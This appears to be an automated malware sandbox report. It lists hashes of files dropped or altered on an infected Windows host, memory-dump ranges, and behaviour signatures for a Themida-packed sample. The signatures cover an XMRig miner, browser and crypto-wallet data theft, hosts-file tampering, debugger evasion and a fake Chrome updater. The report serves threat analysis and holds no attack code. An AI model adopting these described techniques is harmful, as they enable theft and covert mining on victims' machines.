SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Local Storage\leveldb\LOG

MD5 7a5f4f4f6ee213aa284332ebc8ad9e77
SHA1 e9ecf32a90f00bed983d92adbf5df789f78dd4f3
SHA256 238514dcc8e7692e8660d4a7afbbfe5ddbb9d87971c6759a499e749f22b85f33
SHA512 1e0ad71f09358ffd0f9d1d7960d850795aebb199d1f3f2b15cf3191f47cdca24e938cc856c52f691636145d3be6346a61f912ac0c357a1a46231e88fc2a51c52

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Local Storage\leveldb\LOG.old

MD5 f6bfa7b546513ea42975fa47714913d4
SHA1 f89fd1d28f5c2ddc67ccf3723ee0101b4fceb6ea
SHA256 73fc943c4b40df27f343ddb47e94dbe7cc282f549cabbe118edd1c1becf616b3
SHA512 45a43dcc4b0b5c5c02cc872862d02545ede7400033728f2afa7e6728e7a6fe310dcd95d84dff9ab4c47b9df9b261fee96447d48183edef44a69739659cc5f91c

memory/3056-340-0x00000000776B0000-0x0000000077859000-memory.dmp

memory/3000-341-0x00000000746A0000-0x0000000074D8E000-memory.dmp

memory/3000-342-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3000-343-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3000-344-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3000-346-0x0000000000FC0000-0x0000000001002000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Session Storage\CURRENT~RFf77824a.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/1084-397-0x000007FEF3840000-0x000007FEF41DD000-memory.dmp

memory/1084-399-0x000000001B260000-0x000000001B542000-memory.dmp

memory/1084-403-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/1084-417-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1084-432-0x000007FEF3840000-0x000007FEF41DD000-memory.dmp

memory/1084-436-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1084-437-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1084-438-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1084-439-0x000007FEF3840000-0x000007FEF41DD000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7ecad5fccb5278bcc95c0ab23b6ecc44
SHA1 ed6806ed0fdba939ff3fafe0a185adc013184f60
SHA256 85b8707e8412ac6ad085d7ee9220b6392ddbab7424a820a7c7885134f6583887
SHA512 35f13b747aa3a5e144719f27a5d2f63b8d2fb8c24efcaaf82649a27f3f4be1a08a747a882d0dcd7065c196e8f727424292874b4c9ee683c72a55af9fd186af25

memory/1836-453-0x000000001B250000-0x000000001B532000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WZRHT7BSM54BIND2NFLO.temp

MD5 7ecad5fccb5278bcc95c0ab23b6ecc44
SHA1 ed6806ed0fdba939ff3fafe0a185adc013184f60
SHA256 85b8707e8412ac6ad085d7ee9220b6392ddbab7424a820a7c7885134f6583887
SHA512 35f13b747aa3a5e144719f27a5d2f63b8d2fb8c24efcaaf82649a27f3f4be1a08a747a882d0dcd7065c196e8f727424292874b4c9ee683c72a55af9fd186af25

memory/1836-455-0x000007FEF37D0000-0x000007FEF416D000-memory.dmp

memory/1836-457-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1836-458-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1836-456-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1836-454-0x0000000001F60000-0x0000000001F68000-memory.dmp

memory/1836-459-0x000007FEF37D0000-0x000007FEF416D000-memory.dmp

memory/1836-460-0x0000000002910000-0x0000000002990000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 190643b56fa97dbf7b2513696b0e9ae6
SHA1 3dccb86c85db2016ff2d7356cbadb3e94933a148
SHA256 03aac08e03a290309504516742cada9462099d71cd85bdff15b2810d30940d80
SHA512 3e4605861ee498c93e9a016d8a3aa91724fb2f9bf63ab5819180eba49cf0581194b717e0f8b08bf25e2c4c731ad4fe5531189cbc62d9541c16a5892cc9dfb660

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

memory/1836-513-0x000007FEF37D0000-0x000007FEF416D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/3056-520-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3056-521-0x00000000776B0000-0x0000000077859000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\a10114f36c8fd0e0_0

MD5 287c4c8e05e6299561755cc76bc2fa94
SHA1 923143d05a12c4565a63d64b26906c28c9b66b00
SHA256 eecbfe381c127ce200f220f25767e64d746afe9a968d6db2f97eaf64f3d30bc1
SHA512 909bb40356923adaad5de242ce5f48d05390d7826223116489afcebc3cd766023db2f11aff1e4fce4acd1ebfdbfe884793ea15f57aa5864ba8ed9e75662cd3ad

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\96a28fcf7167b04a_0

MD5 dfab372a6f7488e6d95f33c2ae3c40e4
SHA1 b89f7488011059c2836b84e4546650ba2c8c74be
SHA256 edb3ff2f01f078c3fa6814d2baf60b1a5860bd07a4d63e561ba1275f57621d97
SHA512 f9375e02fbec1efcfc42cd6056ca106ece207227d6b588fb1ee8ae68d61b1fdf51acf86f0be4de9a2a212f1746e8526cc5667e0f9d4aae3838f70e23c8554cc4

memory/2432-670-0x000000013F100000-0x0000000140326000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\54eb26ed8d10da3d_0

MD5 494c73694b3374cdb224b2ba2c160020
SHA1 7eb73637ba9d7c410dc29f11d0d45a364d8d58ad
SHA256 fd1f62fc30c12914ed4b72fb4d6f9efd8ab1fef43e4af45eca96dc79d61251dd
SHA512 c74af69bc9277e0d55339948d7b8dccfd49a09b6c6d39f938f1bb58d249bb821e1d5b60fea67185188a3ce3fcb9b156089ba4f67327c64a7e4318e4ef1cf74af

memory/3000-673-0x00000000746A0000-0x0000000074D8E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\538c87078bedf74f_0

MD5 9bbe62b7643429140b741a3077cc2a21
SHA1 d0ee45418a538142486504d7183df1d8933d3b46
SHA256 39c489fa6c6488416adfa086f0aa45748b0bb4976fec5f522b39a6d24c082658
SHA512 c8dcb9fe4914e705096eff542050afca508473881a8d157ec59b476e86cf9da28b4405d701c21a1e75c5c8a3ef0c88c207a23b725501dc7c748d112c9524ca58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\408242ca35bda2b3_0

MD5 4243ae6e30761bfa61a97b4d55c5d819
SHA1 b1014bcacb06d59ec4b109433fe9facb6301db9e
SHA256 469c8d8656434a28d5da1b4f34b3d3b1a0cf6221380eb585fa2a15e12a1d4436
SHA512 d0871900655239a2d72b478af4fe5971951f24f36932c4581000b4b284476bd727be9f455d35b78441ef9a2d327540e984400d370e1c8f78c02ff2a7d9f84832

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\3978e55ddeca1efa_0

MD5 ca389db644ae12fa7edb4a3fe8cfb5eb
SHA1 704df1b872b692b4249b93c2f455c4f6c41ef557
SHA256 815bb134ba146e0d1d9c51abaeab2c71140aaa4b046ce2ee0b1fd46d57530b3e
SHA512 f2515aee7c0161f025a3251a6b52d7ef1e21b18b5b696ce496ed664ec6a9cdb9b858804f7957a1105c80a3bdbe8d6130d2813a969c13681da5914ad869d480b8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\324e3ea02013107f_0

MD5 eabdbed68e6755b10c71711d5585986a
SHA1 49d746a69a6465579c66ea3900ea76a5ecda3104
SHA256 674c0781596561ea6c1ca4b907422a568de1a36f32df60e2d4f1771e9961e2c0
SHA512 334debe3c41143a58b0844631e2d46e470fc0cd6e2b92471f4790345acf64fb1a0687e9e17a8dfd4c1badb8c937c49ba850cb89d8bb91080183712440de48b66

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 637e50a9dbc5c2b96f81944dc323df0e
SHA1 a3ee148b21c0c0d328b27ff91a1c73a57a8d2e3b
SHA256 fd24060fd0ddca25479cbc3778f2eadb97b05af9615f19ef95d0ef4acee6e8d1
SHA512 dbc4d8c39969b5c4940b485e95d333c5a266a0a3c993bcb86d073195a4076b1f29d2d02c4ddfbc875b0652d081e80504db2f44a721b09f3d70f03325c83375f6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\1c5038ca8204eb27_0

MD5 b256b9b38ca7e13afe76048d41d71e6e
SHA1 d7b8b2835b1af017489acf4b227213549f623ac2
SHA256 871af4d3bb87b64fbc814fd0ca83e43da80f8cfe38ac35cdb83577ae44411c2b
SHA512 5857b6ed4d7438a8c7d6ba33df19a9e5c9978827d494de5c13bc1a493c3d1f7a5606454a2c66c67fef8f2849e9c995e5bd9d6c30a41efb9fb15ffc0f4e8bd3c7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\058d705eacca1e5f_0

MD5 5a38129e82060cfc8a77e29c3d3cc6dc
SHA1 2eb711cc06d6e3d59b97cf386062bcc5b28e9924
SHA256 6db73e9365fadc123902b3bf94669fa460de74d802fc487cbdc9e55494da209e
SHA512 497b491455e454bacc15944b7caad6505f8d18ea3d097b47f3144d3717dc6381839a693ec17b7718a26089557b5b9bb432c357995e9ee3ab6a6a247f12911b55

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Code Cache\js\0268938681f021db_0

MD5 c00393db7047dec72be5229cce014cbf
SHA1 e989f657635fd38784fd0360bc41e46172014173
SHA256 26174af6125fc464d94f104067723cb100bd8c111f05144f51b1e1bcb48962dc
SHA512 03baaf2031b8f36b07e6b63378115adc408a09da608227f88ee5e27af5142d0d274bbb25eb3f71b70eda9024091f31ea4a5b0c724cb66b6cad3742c9f0cad004

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\index

MD5 ecc9ec5ffa912460d0e1d019419f5b81
SHA1 e1043e1fa042b7da7229c98d8d084efb015ae751
SHA256 d46114094b1c079b2dbbaf51ab12a01c0993306384a612d3e9122813c3202c94
SHA512 1ad5b3a1f93963519d3d9675f37d67add9314f9f6f237aab81b84e62f1a62ef4c02a455fb418b0285d62d1843814b98406d070ba13f9b1f6502eab39a7b67bcd

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_00000e

MD5 db2bafd5a7299458ee228a5f55cafe46
SHA1 495b0477fc5af81b0106cd2e6bda8c80d818095a
SHA256 05cb8f3ad6c20f5a1ffe392b285749c857a8194ed761dfe4a62ce85a02102043
SHA512 8afb1abaccb447157d3045873ee9ec92d6858ce828b8a637d760d38561302e31e79e408d2bad51585a6585bdf0a4b72652e5e6e5799d4f3d171b120d1aba26bb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_00000d

MD5 2072fefb4817f8483253e4ff2685f61f
SHA1 8ad00d28bf9cced992998f4f07b2b45bfbcb276e
SHA256 e4edfbe4f8439c055ab91647f92af65dffb2832334d7934d3edf95ab75a6fc6c
SHA512 67b9771791856c0906e240ed046aca1c47fe15cf807b02e7c00f07ffc566a6941694467ae72f8eb21efd0c67d16fbc652bfbe01d897c61127ae542176d1c56a1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_00000c

MD5 27cd2cadf2c6803021503d69ef6adb59
SHA1 42db3241dceb8e751bc394963be6c3a600c63438
SHA256 d1b75085ea35b7053cf99dcd0764c28eb035f1228ca2fa4393040a0f1f4e3927
SHA512 6f1862d0cf21c62bc047ebcf66fdabe392c18e3a4534206941fa9ccf0e155c51b1dac0d1409b2283de08fe22782b5d8f48d8956fd33c6e0ccb006a8a9f4acfec

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_00000a

MD5 355dcc3d527c3e9cee6ad0819e479211
SHA1 2e31ed9f7f6214bcc6419de03438c6613357ce56
SHA256 2096b2907f5170ec6a2eb2a418547e187f0e9e03ebd1b4fcf97c948acfb07f7c
SHA512 d61d48c09735e749a7448ac05c577fabdd0b3508aff5acfbd256d141c9dedd209263ecc9d3ef0bfcf80dc83e64115530dba88c608c43f96ec3df366c24a983eb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000009

MD5 626d89def2daf3b6382f8980b8a7214d
SHA1 229c63199e7163780e8cf7eff1cb29eb5476e9df
SHA256 04c5e697c3a5f8147ceaa2f9a5155e4b58c3433c0e04165854619bcfe1a1ab44
SHA512 3740b77072543538a32c4a4d8c1e1814f4564df9d094e02558a51862374584e05851f1dd7f50f75f083798db002d84701b6434f4777f4d65e38546cd710aad42

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000008

MD5 d453afffdfdc0b4a8dade7dc8c9572d6
SHA1 58059302d94ed9744e739e388d24bde852996908
SHA256 9c34eeebfce83033015f38c7a605d1fed811fb54720409bfe06ad5c2c91fe2d1
SHA512 2678c762ac65b5edebd1ae552e061495f551a4d037d0dfd0732c98c3e197e498a1b020c927e11f2c3dbd388dcd863f83990632581582e20767b8bb1a0b0f6927

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000007

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000006

MD5 5ca9c119403d3c0232849ea215008686
SHA1 06b4fef2dbdc0709c7edcdf8c35bb89d9f020ed2
SHA256 d7d39741765231d5408c5a7166713d079108c1ff4d780095e9aee2218203cc98
SHA512 f8322e578a455743cce7fac74feafb7c37c0d65dcd278dab774f367fcb86563012ffb83bf384dd262be90d83c855b44f22546d8253b4833e886a8fda71beaa95

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000005

MD5 99374f3368b192f0ebb50e2ec284e2eb
SHA1 9415121c85654b2bf0a98576c11589ff304665c9
SHA256 85e81bcb282f3c74de592b44362f4adc0271e43743de6bd3c984e59c840d7f28
SHA512 582886a6ff12929ae865e2ceba30e96d0e5a77e2a09b6ba130f2416fc6ac544bc2bd2337df145dabbcae84d13a67e9922a0890c77c40b06149d562116b35a311

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000004

MD5 500ecdda9ad3e919a1f41c1588266a1b
SHA1 d5ddf92dc08284a48701a4d3555590bda05f77e0
SHA256 caad3feace9086d27e006d538d2daf4dd50e2b33307232a7db6d5f8c48f73b37
SHA512 5e47a0d0721ec0f9adb5a439ffc98c1b4da780e74270332313f8350f228bdb919d32c4812c6ede84ebae3ead1342c2eaf4c73f4dfca5a87e8887e1b5913c0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000003

MD5 da4cec20c30abd49c5b03cb178c6e5f7
SHA1 c7a0efa3f505a46e5e5001e4fccbef753f52c119
SHA256 11a703e00e1246b141133c860527146c54979728745aaa1858c20d819144f56a
SHA512 60279e6b06b7d8994c1abc2e75617ff39562fcdcfb4b3d693d5db6b18e05eaea3bec033857bf1dc357a8e9b5228fbf272efd034f048ce4cefb6b005e18e0d26e

memory/1980-675-0x00000000776B0000-0x0000000077859000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\f_000002

MD5 44d12dc4a3dc874f8c0182d8113c1590
SHA1 0c5b2dbac5f5265cb045373939890c5ea265af80
SHA256 14c577cbf6a8fbfc3a023adc135a59d45024566b909ee3482e058cf01f600f3a
SHA512 9e532617e92005a3b21f8b64a421326519f28c6146676ad9b4c8e4f2fa059abb1d5c8abde28c23ac1d1750641a0007da7caab34d58abeef039d87f9fde82b0e4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\data_3

MD5 7e1edff37a1f632d8799740303ff0ced
SHA1 3987ea4cf0bb49949dc1ed131b2b136d6f5f17f9
SHA256 c36a38dc1978f257897fe946efdeea6bce5e2c8dff54b441fd433feed06d3186
SHA512 2cabf1375a989a9aeff7886e982548d59b758af983b64a5bb908a4b1b4fca7f9acfc657e62448e71e24933cbbf371280be4fd2c49db8f7f05e5929a35818b320

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\data_2

MD5 dfe44de34661f5373b943e36335f0c55
SHA1 661a77f7455972974e4523ed6080f13207394bd5
SHA256 df04606ec95a2f120aae196061108ee9e9d2ccf291e9394cfb0724ef7087fd95
SHA512 32f44e3047029d779004abb5ae6ee3bd25c3d67d5e704b03c557ac8abe85ab9f687ea48d6c64679bfbf2319a83ad723dd6b7aeed4f11a79f23a962d78c90d30e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\data_1

MD5 69a2b3f9aab6443e037cdba194c235c8
SHA1 3bf4126838effcaef10c9f769ff12843b19ef97f
SHA256 ea0a17693050d00763464fea1c53475f6554e9145cc2712a886ecfcdbea7d0a8
SHA512 f46c7169dd81df15ff15cc4e60b9bfedc5b1e67ff437519f0801eff517adbec3ef60693ad7247230e04cf61498206571937a88a0be7c644eef81ff8c065f11ad

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Cache\Cache_Data\data_0

MD5 583c86d0305ac30d6cf232811b62f4f8
SHA1 7f1822bea571041f09aa7cb53630bd38be9bbbea
SHA256 b76fad5c29c787df1e90d7a6911e2340f3bfbca03cca5bb0776ab0f34a9fd021
SHA512 fe9230a176052743d371b7ebf180a82d5a416b3472e21f2ddb9932e0df45f3b050d26aa4ca75840d258d8563aa82cdc2efb5639105f114b773a3384302e25e18

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\chrome_debug.log

MD5 34cd1dae1e923efb3baff79fec0e6e94
SHA1 55e888ab7204cda4373e6489e6cc8e694ffb9d80
SHA256 45492ef435fdaa975203d308b5b1c706ea58e964a5656783899f0251c0200c58
SHA512 83d39f760ecfe60206b69649c064dcf8369fd31450d9daed7a4068ad1e863bcf835e4eda0591972e4bcf29755d46016d8b99c832c01a07f8d18445207f03b607

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Crashpad\settings.dat

MD5 ae116a31fdeb5cfacd55007267748e83
SHA1 8e877984aff3c58ede1a47466ee90f3dc7b4605d
SHA256 ae0c00bd29f7d6856332122ed084750b53712135c69eb314f296c8b665ae98e5
SHA512 d8cf3f3f37169be100fc22dbcd19fc1d4ed6f59bd0dd1b2f5d0fe5dda201ce37ca2150bcd1e68f0b86cac333052c864819dd00476c3ca631f1abfef92f05f881

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\DevToolsActivePort

MD5 fe81015ad3fa0598209c2d579342c025
SHA1 bd379c418287019f70e2da4d14d942cc3b637898
SHA256 e3033de381aef533485baddd7ec8cb7c2088524418e6690b5d2b3bfffa995adc
SHA512 2bd924eadee5742c501a0dff130a239cc9a66362ca6330afb11862dee9107bbee456920e05e07b70b1ff99743c2a654ca08b2ab90f9a9a2a231815b3f85a02bd

memory/2432-681-0x000000013F100000-0x0000000140326000-memory.dmp

memory/1980-683-0x000000013F100000-0x0000000140326000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-08 00:01

Reported

2023-08-08 00:03

Platform

win10v2004-20230703-en

Max time kernel

82s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
